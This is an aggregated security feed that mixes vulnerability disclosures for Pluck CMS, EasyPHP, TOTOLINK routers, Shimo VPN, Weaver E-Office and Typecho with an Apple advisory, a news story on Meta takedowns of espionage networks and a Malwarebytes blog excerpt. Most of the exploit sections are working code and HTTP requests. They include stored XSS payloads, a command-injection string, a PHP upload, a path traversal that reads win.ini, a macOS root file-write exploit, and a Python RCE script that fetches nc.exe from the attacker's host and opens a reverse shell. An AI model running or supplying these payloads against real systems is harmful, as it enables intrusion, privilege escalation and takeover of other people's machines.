Pluck CMS version 4.7.18 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)Application: pluckVersion: 4.7.18Bugs:  XSSTechnology: PHPVendor URL: https://github.com/pluck-cms/pluckSoftware Link: https://github.com/pluck-cms/pluckDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. create .svg file.2. svg file content:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1Host: localhostContent-Length: 672Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/pluck-4.7.18/admin.php?action=filesAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8deConnection: close------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

Pluck CMS 4.7.18 Cross Site Scripting

Apple Security Advisory 2023-05-03-1 - AirPods Firmware Update 5E133 and Beats Firmware Update 5B66 address bluetooth authentication vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-05-03-1 AirPods Firmware Update 5E133 andBeats Firmware Update 5B66AirPods Firmware Update 5E133 and Beats Firmware Update 5B66address the following issues. Information about the security contentis also available at https://support.apple.com/HT213752.AirPods Firmware Update 5E133Released April 11, 2023BluetoothAvailable for: AirPods (2nd generation and later), AirPod Pro (all models),AirPods MaxImpact: When your headphones are seeking a connection request to oneof your previously paired devices, an attacker in Bluetooth range might beable to spoof the intended source device and gain access to your headphones.Description: An authentication issue was addressed with improved statemanagement.CVE-2023-27964: Yun-hao Chung and Archie Pusaka of GoogleChromeOSFirmware updates are automatically delivered while your AirPods arecharging and in Bluetooth range of your iPhone, iPad, or Mac.Learn more about firmware updates for AirPods. Beats Firmware Update 5B66Released May 2, 2023BluetoothAvailable for: Powerbeats Pro, Beats Fit ProImpact: When your headphones are seeking a connection request to oneof your previously paired devices, an attacker in Bluetooth range might beable to spoof the intended source device and gain access to your headphones.Description: An authentication issue was addressed with improved statemanagement.CVE-2023-27964: Yun-hao Chung and Archie Pusaka of GoogleChromeOSIf you paired your Beats wireless headphones with your iPhone, iPad, orMac, your Beats will update automatically. Learn more about firmware updatesfor Beats. You can check the firmware version of your wireless headphones in Bluetoothsettings on your device. 1. On your iPhone or iPad, go to Settings > Bluetooth. On your Mac, go toSystem Settings > Bluetooth. 2. Tap on the info button next to your headphones.-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmRS94AACgkQ4RjMIDkeNxnu4g/+ORGK+ShjgE7mTdv7kmpBLzslblq6S9h/z3Q5GDcs9nyzxkXt3Q9/WRRdgUoPdGavnsIqfY5yU7qig1ybUQItEsGuEz4jF32gmXTuUMTUnAYHVSZYgmo/6tlT2Vvo08R+5fNWjBNxqEQMM0hQjzj3I37fsIEBR7CwGvzvsofrctRkfPuEi6q+yztMmM1LuVAixeHTy2J/GLXPA62WBUVdfooEAEIHQADHbXRgvvjALhIegyut4DY7BjJKSYo/n5U8NHxh/HjocgxATJUAUJU2ua2QrRWnzLA1n2HS9mJdm385FS3NZTRXfvTMMeAix7DAE82utWkweTIF5rmycjnQ8GHgqFSgtUWS9aMe7Hjj9872rDmIFwi2EQk0LtWAElhqF4yGkwa42+CKraa48XR1Ai9/QBNoeJPkNzRu7UZrrB5inYNaWP6nGX8XTS2rrxHDo1PFUYI7eEkqu5pq78LEQzyvnfx5scBwBXfc4dmkuzmn9+UbYlHLoKmni1w6mS8v0yXqCPXI+gG3dO3lmoshtPbqvaE+yTjLcG57rS61Dxol2Q00iL4ZvDbbYp/9c08W1SkVh4PCeKss3+CxBZ2/a4GBpESjkq7EdipRVkXC3TjN+ZvGMETXetBW102+c0gF49uBR+w+nouTRxK+boYBqPxAkhHsn7z6o31sCT2Op9s==AsH2-----END PGP SIGNATURE-----

Apple Security Advisory 2023-05-03-1

EasyPHP Webserver version 14.1 suffers from remote code execution and path traversal vulnerabilities.

# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and  
Path Traversal)  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-06  
# Vendor Homepage: https://www.easyphp.org/  
# Software Link : https://www.easyphp.org/  
# Tested Version: 14.1  
# Tested on:  Windows 7 and 10

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8  
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-78

Vulnerability description: There is an OS Command Injection in EasyPHP  
Webserver 14.1 that allows an attacker to achieve Remote Code Execution  
(RCE) with administrative privileges.

Proof of concept:

To detect:

POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
Origin: http://127.0.0.1:10000  
Connection: keep-alive  
Referer: http://127.0.0.1:10000/index.php?zone=settings  
Host: 127.0.0.1:10000

app_service_control=calc.exe

The calculator opens.

Exploit:

# !/usr/bin/python3  
import requests  
import sys

if len(sys.argv) != 5:  
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")  
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %  
sys.argv[0])  
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %  
sys.argv[0])  
    exit(1)

else:  
    target = sys.argv[1]  
    targetport = sys.argv[2]  
    localip = sys.argv[3]  
    localport = sys.argv[4]  
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in  
the directory

    payload =  
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"  
+ localip + ':8000' +  
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"  
+ localip + "+" + localport + "+-e+cmd.exe\""  
    print (payload)  
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'  
    headers = {  
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"  
    }  
    data = {'app_service_control':payload}

    try:  
        r = requests.post(url, headers=headers, data=data)  
    except requests.exceptions.ReadTimeout:  
        print("The payload has been sent. Check it!")  
        pass

# Vulnerability Type: Path Traversal

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-22

Vulnerability description: An issue was discovered in EasyPHP Webserver  
14.1. An Absolute Path Traversal vulnerability in / allows remote users to  
bypass intended SecurityManager restrictions and download any file if you  
have adequate permissions outside the documentroot configured on the server.

Proof of concept:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini  
HTTP/1.1  
Host: 192.168.X.X:10000  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,  
like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

HTTP/1.1 200 OK  
Host: 192.168.X.X:10000  
Connection: close  
Content-Type: application/octet-stream  
Content-Length: 499

; for 16-bit app support [fonts] [extensions] [mci extensions] [files]  
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1  
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo  
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo  
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo  
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo  
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo

EasyPHP Webserver 14.1 Path Traversal / Remote Code Execution

TOTOLINK A7100RU V7.4cu.2313_B20191024 has a Command Injection vulnerability. An attacker can obtain a stable root shell through a specially constructed payload.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取参数internetPri中的内容传递给v20，之后将v20带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setSmartQosCfg",
"internetPri":"1$(ls>/tmp/123;)"

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-30054: ttt/161 at main · Am1ngl/ttt

TOTOLINK A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取参数iptvVer中的内容传递给v19，之后将v19带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setSmartQosCfg",
"iptvVer":"1$(ls>/tmp/123;)"

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-30053: ttt/160 at main · Am1ngl/ttt

An issue in the helper tool of Mailbutler GmbH Shimo VPN Client for macOS v5.0.4 allows attackers to bypass authentication via PID re-use.

**Shimo 5.0.4 - Privilege Escalation**

In the Shimo VPN client in version 5.0.4 on macOS, the com.feingeist.shimo.helper tool implements an unprotected XPC service that can be abused to create scripts as root on the filesystem, what can lead to privilege escalation.

When a client connects to the service the incomming connection is verified using processIdentifier instead of audit_token. Such a mechanism is prone to PID reuse attack. During this attack it is possible to impersonate a legitimate client and use all methods offered by ShimoHelperToolProtocol protocol.

Vulnerable method of ShimoHelperTool Class. As shown below, the verification is based on PID, so it is possible to bypass client restrictions:

/\* @class ShimoHelperTool \*/
-(char)listener:(void \*)arg2 shouldAcceptNewConnection:(void \*)arg3 {
    r13 = self;
    r15 = \[arg2 retain\];
    r12 = \[arg3 retain\];
    rax = \[r13 listener\];
    rax = \[rax retain\];
    if (rax == r15) {
            \[rax release\];
            if (r12 != 0x0) {
                    var\_48 = r13;
                    var\_50 = r15;
                    var\_40 = \*\*\_kSecGuestAttributePid;
                    rdx = \[r12 processIdentifier\]; // VERIFICATION IS BASED ON PID
                    rax = \[NSNumber numberWithInt:rdx\];
                    rax = \[rax retain\];
                    r15 = rax;
                    var\_38 = rax;
                    rax = \[NSDictionary dictionaryWithObjects:rdx forKeys:&var\_40 count:0x1\];
                    r13 = \[rax retain\];
                    \[r15 release\];
                    rax = SecCodeCopyGuestWithAttributes(0x0, r13, 0x0, &var\_60);
                    if (rax != 0x0) {
                            r14 = 0x0;
                            syslog$DARWIN\_EXTSN(0x3);
                    }
                    else {
                            rax = SecRequirementCreateWithString(@"anchor apple generic and (identifier \\"com.feingeist.Shimo\\" or identifier \\"com.feingeist.Shimo-setapp\\") and certificate leaf\[subject.OU\] = UD5L677SZR", 0x0, &var\_58);
                            if (rax == 0x0) {
                                    rcx = &var\_68;
                                    rax = SecCodeCheckValidityWithErrors(var\_60, 0x0, var\_58, rcx);
                                    if (rax != 0x0) {
                                            r14 = 0x0;
                                            syslog$DARWIN\_EXTSN(0x3);
                                    }
                                    else {
                                            rax = \[NSXPCInterface interfaceWithProtocol:@protocol(ShimoHelperToolProtocol), rcx\];
                                            rax = \[rax retain\];
                                            \[r12 setExportedInterface:rax, rcx\];
                                            \[rax release\];
                                            \[r12 setExportedObject:var\_48, rcx\];
                                            \[r12 resume\];
                                            r14 = 0x1;
                                    }
                            }
                            else {
                                    r14 = 0x0;
                                    syslog$DARWIN\_EXTSN(0x3);
                            }
                    }
                    var\_30 = \*\*\_\_\_stack\_chk\_guard;
                    \[r13 release\];
                    \[r12 release\];
                    \[var\_50 release\];
                    if (\*\*\_\_\_stack\_chk\_guard == var\_30) {
                            rax = r14 & 0xff;
                    }
                    else {
                            rax = \_\_stack\_chk\_fail();
                    }
            }
            else {
                    rax = sub\_10000ea0a();
            }
    }
    else {
            rax = sub\_10000ea2d();
    }
    return rax;
}

**Exploit code**

Following expoit code was used to connect to the vulnerable helper, impresonate a legitimate client using PID reuse attack and execute a mehod writeConfig: atPath: withReply:, which allows for writing an arbitrary file at the disk. The file is created and owned by root user :

#import <Foundation/Foundation.h\>
#include <spawn.h\>
#include <signal.h\>

// gcc -framework Foundation -framework Security shimo.m -o shimo

static NSString\* XPCHelperMachServiceName = @"com.feingeist.shimo.helper";

@protocol ShimoHelperToolProtocol
- (void)setTimeMachineEnabled:(BOOL)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)runVpncScript:(NSString \*)arg1 withReason:(NSString \*)arg2 withReply:(void (^)(NSError \*))arg3;
- (void)cleanSystem:(unsigned long long)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)cleanKnownHostsForRemoteHost:(NSString \*)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)unloadKernelExtensions:(unsigned long long)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)loadKernelExtensions:(unsigned long long)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)configureRoutingWithCommand:(NSString \*)arg1 withReply:(void (^)(NSError \*, NSString \*))arg2;
- (void)terminateRacoonDaemonWithReply:(void (^)(NSError \*))arg1;
- (void)reloadRacoonConfigWithReply:(void (^)(NSError \*))arg1;
- (void)updateNameServerAddresses:(NSArray \*)arg1 searchDomains:(NSArray \*)arg2 defaultDomain:(NSString \*)arg3 forServiceIdentifier:(NSString \*)arg4 withReply:(void (^)(NSError \*))arg5;
- (void)deleteConfigAtPath:(NSString \*)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)writeConfig:(NSString \*)arg1 atPath:(NSString \*)arg2 withReply:(void (^)(NSError \*))arg3;
- (void)disconnectService:(long long)arg1 fromRemoteHost:(NSString \*)arg2 withComPort:(unsigned long long)arg3 withPID:(int)arg4 withReply:(void (^)(NSError \*))arg5;
- (void)connectOpenConnectWithConfig:(NSString \*)arg1 toHost:(NSString \*)arg2 withCredentials:(NSString \*)arg3 withHash:(NSString \*)arg4 withComPort:(unsigned long long)arg5 withReply:(void (^)(NSError \*, int))arg6;
- (void)connectRacoonToHost:(NSString \*)arg1 withCredentials:(NSDictionary \*)arg2 withComPort:(unsigned long long)arg3 withReply:(void (^)(NSError \*, int))arg4;
- (void)connectSSHWithConfig:(NSString \*)arg1 toHost:(NSString \*)arg2 withCredentials:(NSString \*)arg3 withComPort:(unsigned long long)arg4 withReply:(void (^)(NSError \*, int))arg5;
- (void)connectPPPWithConfig:(NSString \*)arg1 withCredentials:(NSDictionary \*)arg2 withComPort:(unsigned long long)arg3 requiresRacoon:(BOOL)arg4 withReply:(void (^)(NSError \*, int))arg5;
- (void)connectVPNCWithConfig:(NSString \*)arg1 withComPort:(unsigned long long)arg2 withReply:(void (^)(NSError \*, int))arg3;
- (void)connectOpenVPNWithConfig:(NSString \*)arg1 withManagementPort:(unsigned long long)arg2 withReply:(void (^)(NSError \*, NSString \*))arg3;
- (void)setTmpDirPath:(NSString \*)arg1;
- (void)setShimoBundlePath:(NSString \*)arg1;
@end

int main(void) {

    #define RACE\_COUNT 10
    #define kValid "/Applications/Shimo 2.app/Contents/MacOS/Shimo" // HERE
    extern char \*\*environ;

    int pids\[RACE\_COUNT\];
    for (int i = 0; i < RACE\_COUNT; i++)
    {
        int pid = fork();
        if (pid == 0)
        {
        NSString\*  \_serviceName = XPCHelperMachServiceName;
        NSXPCConnection\* \_agentConnection = \[\[NSXPCConnection alloc\] initWithMachServiceName:\_serviceName options:4096\];
        \[\_agentConnection setRemoteObjectInterface:\[NSXPCInterface interfaceWithProtocol:@protocol(ShimoHelperToolProtocol)\]\];
        \[\_agentConnection resume\];

        id obj = \[\_agentConnection remoteObjectProxyWithErrorHandler:^(NSError\* error)
         {
             (void)error;
             NSLog(@"Connection Failure");
         }\];
        NSLog(@"obj: %@", obj);
        NSLog(@"conn: %@", \_agentConnection);
        //get FW state
        NSString\* sudo\_config = @"teststring";
        NSString\* sudo\_path = @"/Library/Scripts/poc.sh";
        
        // - (void)writeConfig:(NSString \*)arg1 atPath:(NSString \*)arg2 withReply:(void (^)(NSError \*))arg3;
        \[obj writeConfig:sudo\_config atPath:sudo\_path withReply:^(NSError \* err){
             NSLog(@"Response: %@", err);
                 }\];
 
        NSLog(@"Done");
        // start PID reuse
        char target\_binary\[\] = kValid;
        char \*target\_argv\[\] = {target\_binary, NULL};
        posix\_spawnattr\_t attr;
        posix\_spawnattr\_init(&attr);
        short flags;
        posix\_spawnattr\_getflags(&attr, &flags);
        flags |= (POSIX\_SPAWN\_SETEXEC | POSIX\_SPAWN\_START\_SUSPENDED);
        posix\_spawnattr\_setflags(&attr, flags);
        posix\_spawn(NULL, target\_binary, NULL, &attr, target\_argv, environ);
        }
        printf("forked %d\\n", pid);
        pids\[i\] = pid;
    }
    // keep the child processes alive
    sleep(10);
    
    cleanup:
    for (int i = 0; i < RACE\_COUNT; i++)
    {
        pids\[i\] && kill(pids\[i\], 9);
    }
}

**POC**

Once the exploit code is executed a file poc.sh has been created

    user@catalina1 exploit % ls -la /Library/Scripts
    total 8
    drwxr-xr-x  11 root  wheel   352 Apr  1 04:40 .
    drwxr-xr-x  66 root  wheel  2112 Aug 30  2021 ..
    drwxr-xr-x  10 root  wheel   320 Aug 24  2019 ColorSync
    drwxr-xr-x  15 root  wheel   480 Aug 24  2019 Folder Action Scripts
    drwxr-xr-x   6 root  wheel   192 Aug 24  2019 Folder Actions
    drwxr-xr-x   7 root  wheel   224 Sep  3  2019 Font Book
    drwxr-xr-x   8 root  wheel   256 Aug 24  2019 Printing Scripts
    drwxr-xr-x  14 root  wheel   448 Aug 24  2019 Script Editor Scripts
    drwxr-xr-x   7 root  wheel   224 Aug 24  2019 UI Element Scripts
    drwxr-xr-x   5 root  wheel   160 Sep 10  2019 VoiceOver
    -rw-r--r--@  1 root  wheel    10 Apr  1 04:40 poc.sh
    

**Recommendation**

Use the audit token instead of process identifier to create the SecCode references. Example Resource

CVE-2023-30328: randomideas/ShimoVPN.md at main · rand0mIdas/randomideas

A vulnerability was found in Weaver E-Office 9.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file App/Ajax/ajax.php?action=mobile_upload_save. The manipulation of the argument upload_quwan leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-228014 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

    POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
    Host: xx:8088
    Content-Length: 338
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    Content-Disposition: form-data; name="upload_quwan"; filename="1.php@"
    Content-Type: image/jpeg
    
    <?php phpinfo();?>
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    Content-Disposition: form-data; name="file"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

CVE-2023-2523: cve/Weaver.md at main · RCEraser/cve

A stored cross-site scripting (XSS) vulnerability in Typecho v1.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the url parameter at /index.php/archives/1/comment.

**Influenced Version**  
Typecho <= 1.2.0

**Description**  
Typecho comments URL with Stored-XSS vulnerability.  
1.Comment on an article in any capacity with xss payload.  
2.In Comments /usr/themes/default/comments.php,The url parameter filters only the beginning without any other protection, and directly echoed to html.  
3.XSS is triggered when the site is visited again.  

**POC**  
POST /index.php/archives/1/comment with:

    author=1&mail=12%4012&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=1221&_=9d8302e080b9c139354b528787f1e5e4
    

The full POC request:

    POST /index.php/archives/1/comment HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://127.0.0.1/index.php/archives/1/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    author=123&mail=123%40123.com&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4
    

or type directly into the website below then commit:

CVE-2023-30184: Typecho <= 1.2.0 Comments URL with Stored-XSS Vulnerability · Issue #1546 · typecho/typecho

Three different threat actors leveraged hundreds of elaborate fictitious personas on Facebook and Instagram to target individuals located in South Asia as part of disparate attacks.
"Each of these APTs relied heavily on social engineering to trick people into clicking on malicious links, downloading malware or sharing personal information across the internet," Guy Rosen, chief information

Three different threat actors leveraged hundreds of elaborate fictitious personas on Facebook and Instagram to target individuals located in South Asia as part of disparate attacks.

"Each of these APTs relied heavily on social engineering to trick people into clicking on malicious links, downloading malware or sharing personal information across the internet," Guy Rosen, chief information security officer at Meta, said. "This investment in social engineering meant that these threat actors did not have to invest as much on the malware side."

The fake accounts, in addition to using traditional lures like women looking for a romantic connection, masqueraded as recruiters, journalists, or military personnel.

At least two of the cyber espionage efforts entailed the use of low-sophistication malware with reduced capabilities, likely in an attempt to get past app verification checks established by Apple and Google.

One of the groups that came under Meta's radar is a Pakistan-based advanced persistent threat (APT) group that relied on a network of fake accounts, apps, and websites to infect military personnel in India and among the Pakistan Air Force with GravityRAT under the guise of cloud storage and entertainment apps.

The company also expunged 110 accounts on Facebook and Instagram linked to an APT identified as Bahamut that targeted people in India and Pakistan with Android malware that was published in the Google Play Store. The apps, which posed as secure chat or VPN apps, have since been removed.

Lastly, it purged 50 accounts on Facebook and Instagram tied to an India-based threat actor dubbed Patchwork, which took advantage of malicious apps uploaded to the Play Store to harvest data from victims in Pakistan, India, Bangladesh, Sri Lanka, Tibet, and China.

Also disrupted by meta are six adversarial networks from the U.S., Venezuela, Iran, China, Georgia, Burkina Faso, and Togo that engaged in what it called "coordinated inauthentic behavior" on Facebook and other social media platforms like Twitter, Telegram, YouTube, Medium, TikTok, Blogspot, Reddit, and WordPress.

All these geographically dispersed networks are said to have set up fraudulent news media brands, hacktivist groups, and NGOs to build credibility, with three of them linked to a U.S.-based marketing firm named Predictvia, a political marketing consultancy in Togo known as the Groupe Panafricain pour le Commerce et l'Investissement (GPCI), and Georgia's Strategic Communications Department.

Two networks that originated from China operated dozens of fraudulent accounts, pages, and groups across Facebook and Instagram to target users in India, Tibet, Taiwan, Japan, and the Uyghur community.

In both instances, Meta said it took down the activities before they could "build an audience" on its services, adding it found associations connecting one network to individuals associated with a Chinese IT firm referred to as Xi'an Tianwendian Network Technology.

The network from Iran, per the social media giant, primarily singled out Israel, Bahrain, and France, corroborating an earlier assessment from Microsoft about Iran's involvement in the hacking of the French satirical magazine Charlie Hebdo in January 2023.

"The people behind this network used fake accounts to post, like and share their own content to make it appear more popular than it was, as well as to manage Pages and Groups posing as hacktivist teams," Meta said. "They also liked and shared other people's posts about cyber security topics, likely to make fake accounts look more credible."

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

The disclosure also coincides with a new report from Microsoft, which revealed that Iranian state-aligned actors are increasingly relying on cyber-enabled influence operations to "boost, exaggerate, or compensate for shortcoming in their network access or cyberattack capabilities" since June 2022.

The Iranian government has been linked by Redmond to 24 such operations in 2022, up from seven in 2021, including clusters tracked as Moses Staff, Homeland Justice, Abraham's Ax, Holy Souls, and DarkBit. Seventeen of the operations have taken place since June 2022.

The Windows maker further said it observed "multiple Iranian actors attempting to use bulk SMS messaging in three cases in the second half of 2022, likely to enhance the amplification and psychological effects of their cyber-influence operations."

The shift in tactics is also characterized by the rapid exploitation of known security flaws, use of victim websites for command-and-control, and adoption of bespoke implants to avoid detection and steal information from victims.

The operations, which have singled out Israel and the U.S. as a retaliation for allegedly fomenting unrest in the nation, have sought to bolster Palestinian resistance, instigate unrest in Bahrain, and counter the normalization of Arab-Israeli relations.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Meta Uncovers Massive Social Media Cyber Espionage Operations Across South Asia

Categories: News
Critical technology should not require an annual pep talk to function correctly.



(Read more...)




The post World Password Day must die appeared first on Malwarebytes Labs.

The continued existence of World Password Day is a tell that something has gone badly wrong in cybersecurity.

Now in its tenth year, the day is supposed to act as an annual reminder for people to follow good password hygiene: Don’t reuse passwords; use long passwords; no, longer passwords than that; use a collection of random words; no, not those words; use a phrase; use a collection of phrases; don’t forget the weird characters; etc., etc.

This is bad. Critical technology should not require an annual pep talk to function correctly. There is no annual “how to avoid nuclear meltdown” day.

And make no mistake, password authentication is critical technology. It is the bedrock on which security is built. Fail at authentication and it doesn’t matter how “military-grade” your encryption is or if you patch twice a day before flossing, you’re toast.

The existence of World Password Day is a symptom of two problems.

